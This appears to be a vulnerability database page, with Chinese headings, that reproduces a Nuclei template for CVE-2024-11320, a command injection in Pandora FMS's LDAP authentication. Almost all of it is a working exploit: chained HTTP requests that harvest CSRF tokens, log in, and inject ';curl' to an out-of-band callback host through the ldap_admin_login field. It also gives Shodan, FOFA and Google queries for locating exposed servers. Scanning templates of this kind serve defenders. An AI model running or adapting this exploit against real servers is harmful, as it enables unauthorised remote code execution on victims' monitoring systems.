漏洞描述
Arbitrary commands execution on the server by exploiting a command injection vulnerability in the LDAP authentication mechanism.This issue affects Pandora FMS- from 700 through <=777.4
CVE-2024-11320: Pandora v7.0NG.777.3 - Remote Code Execution
PoC代码[已公开]
id: CVE-2024-11320
info:
name: Pandora v7.0NG.777.3 - Remote Code Execution
author: DhiyaneshDK,Shubham Rooter,pdresearch,iamnoooob
severity: critical
description: |
Arbitrary commands execution on the server by exploiting a command injection vulnerability in the LDAP authentication mechanism.This issue affects Pandora FMS- from 700 through <=777.4
reference:
- https://github.com/mhaskar/CVE-2024-11320
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-11320
cwe-id: CWE-77
epss-score: 0.92171
epss-percentile: 0.99702
cpe: cpe:2.3:a:pandorafms:pandora_fms:*:*:*:*:*:*:*:*
metadata:
vendor: pandorafms
product: pandora_fms
shodan-query:
- http.html:"pandora fms - installation wizard"
- http.title:"pandora fms"
fofa-query:
- body="pandora fms - installation wizard"
- title="pandora fms"
google-query: intitle:"pandora fms"
tags: cve,cve2024,oast,rce,pandora,fms
flow: http(1) && http(2) && http(3) && http(4) && http(5) && http(6)
http:
- raw:
- |
GET /index.php?login=1 HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: csrf_code
group: 1
regex:
- 'name="csrf_code" type="hidden" value="([a-z0-9]+)" \/>'
internal: true
- raw:
- |
POST /index.php?login=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
nick={{username}}&pass={{password}}&login_button=Let%27s+go&csrf_code={{csrf_code}}
matchers:
- type: dsl
dsl:
- status_code == 302
- contains(set_cookie, 'PHPSESSID=')
condition: and
internal: true
- raw:
- |
GET /index.php?logged=1&sec=general/logon_ok HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, 'Server health')
condition: and
internal: true
- raw:
- |
GET /index.php?sec=general&sec2=godmode/setup/setup§ion=auth HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: csrf_code2
group: 1
regex:
- 'name="csrf_code" type="hidden" value="([a-z0-9]+)" \/>'
internal: true
matchers:
- type: dsl
dsl:
- status_code == 200
- contains_all(body, 'Authentication method</td>', 'LDAP')
condition: and
internal: true
- raw:
- |
POST /index.php?sec=general&sec2=godmode/setup/setup§ion=auth HTTP/1.1
Host: {{Hostname}}
Referer: {{RootURL}}/index.php?sec=general&sec2=godmode/setup/setup§ion=auth
Content-Type: application/x-www-form-urlencoded
update_config=1&csrf_code={{csrf_code2}}&auth=ldap&fallback_local_auth=1&fallback_local_auth_sent=1&ldap_server=localhost&ldap_port=389&ldap_version=3&ldap_start_tls_sent=1&ldap_base_dn=ou%253DPeople%252Cdc%253Dedu%252Cdc%253Dexample%252Cdc%253Dorg&ldap_login_attr=uid&ldap_admin_login=%27%3bcurl%20xxxxzz.{{interactsh-url}}%20%23&ldap_admin_pass=&ldap_search_timeout=0&secondary_ldap_enabled_sent=1&ldap_server_secondary=localhost&ldap_port_secondary=389&ldap_version_secondary=3&ldap_start_tls_secondary_sent=1&ldap_base_dn_secondary=ou%253DPeople%252Cdc%253Dedu%252Cdc%253Dexample%252Cdc%253Dorg&ldap_login_attr_secondary=uid&ldap_admin_login_secondary=&ldap_admin_pass_secondary=&double_auth_enabled_sent=1&2FA_all_users_sent=1&session_timeout=90&update_button=Update&ldap_function=local
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body,'Correctly updated the setup options')
internal: true
condition: and
- raw:
- |
GET /index.php?login=1 HTTP/1.1
Host: {{Hostname}}
disable-cookie: true
matchers:
- type: word
part: interactsh_protocol
words:
- dns
# digest: 4a0a00473045022028de597b7791375478efc4fab92336f3d51f3e811b1863e6de981f74a553f64f022100d13a7f568658f90d6b217f41681bc192062b65435cbec6de11af8c21e6347011:922c64590222798bb761d5b6d8e72950